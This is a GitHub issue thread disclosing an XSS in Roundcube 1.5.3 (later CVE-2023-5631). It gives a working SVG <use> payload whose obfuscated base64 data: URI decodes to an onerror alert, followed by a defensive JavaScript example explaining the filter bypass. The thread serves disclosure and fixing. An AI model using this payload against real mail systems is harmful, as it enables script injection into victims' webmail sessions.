XSS with svg use tag on RC 1.5.3 #9168

Closed
progsmile opened this issue Oct 13, 2023 · 5 comments

progsmile commented Oct 13, 2023

Hello dear developers!
The following sample triggers XSS for me. I would be pleased if you could check it on the latest Roundcube version.

Reproduce:

  1. Send an HTML message to your mailbox with the following content:
    <svg><use href="dAta:image/s	vg+xml;base64,PHN2ZyBpZD0ieDIiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+IDxpbWFnZSBocmVmPSJ4IiBvbmVycm9yPSJhbGVydCgyMzQpIiAvPjwvc3ZnPg==#x2">

This is the string that is base64-encoded above:

<svg id="x2" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="alert(234)" /></svg>
  2. Ensure the browser alerts with "234"

Env

Roundcube version: 1.5.3
Browsers: Google Chrome (Version 117.0.5938.62), Mozilla Firefox (117.0.1 (64-bit))

Thanks!

progsmile changed the title from "XSS with svg use tag" to "XSS with svg use tag on RC 1.5.3" on Oct 13, 2023
alecpl added this to the 1.6.4 milestone on Oct 14, 2023

alecpl commented Oct 14, 2023

I'm unable to reproduce the issue in either Firefox or Chrome. The href attribute is indeed passed as-is to the browser, but it does not execute the JavaScript code.

Tested with 1.5.4, but I don't see anything related in the changelog since 1.5.3. So, maybe I'm doing something wrong. Could you provide a complete test message?

alecpl commented Oct 14, 2023

Ok, I was able to reproduce now.

alecpl commented Oct 14, 2023

Fixed.

alecpl closed this as completed on Oct 14, 2023

progsmile commented

@alecpl Thanks!

carnil commented Oct 19, 2023

This issue got CVE-2023-5631 assigned.
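
Added example, not part of the thread and not Roundcube's code: the reported `href` mixes letter case and embeds a tab inside the MIME type, which a URL parser strips before resolving, so a filter that pattern-matches the raw attribute and the browser disagree about what the value is. The sketch below contrasts a hypothetical raw-string filter with a check that normalizes first and keeps only same-document fragment references on `<use>`. The function names, the fragment-only policy and the placeholder base64 body (`AAAA`) are assumptions made for illustration.

```javascript
// Constructed sample mirroring the report's obfuscation (mixed case + tab);
// the base64 body is a harmless placeholder, not the payload from the issue.
const SAMPLE = 'dAta:image/s\tvg+xml;base64,AAAA#x2';

// Hypothetical naive filter: matches the raw attribute text.
// Even case-insensitive, the embedded tab makes the pattern miss.
function naiveIsBlocked(href) {
  return /^data:image\/svg\+xml/i.test(href);
}

// What a WHATWG URL parser (as used by browsers and Node) sees:
// tabs/newlines are removed and the scheme is lowercased before parsing.
function parsedView(href) {
  try {
    const u = new URL(href);
    return {
      scheme: u.protocol,
      mime: u.pathname.split(/[;,]/)[0].toLowerCase(),
    };
  } catch {
    return null; // relative references such as "#id" have no scheme
  }
}

// Allowlist check (assumed policy): after applying the same stripping a URL
// parser performs, keep the value only if it is a plain "#id" fragment.
function isSafeUseHref(href) {
  const cleaned = String(href)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  return /^#[A-Za-z_][\w.-]*$/.test(cleaned);
}

console.log(naiveIsBlocked(SAMPLE)); // raw match misses the value
console.log(parsedView(SAMPLE));     // parser still resolves data: + SVG
console.log(isSafeUseHref(SAMPLE), isSafeUseHref('#icon-1'));
```

Denying by default and allowing only the fragment form avoids having to enumerate every spelling of a scheme or MIME type that the parser would accept.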
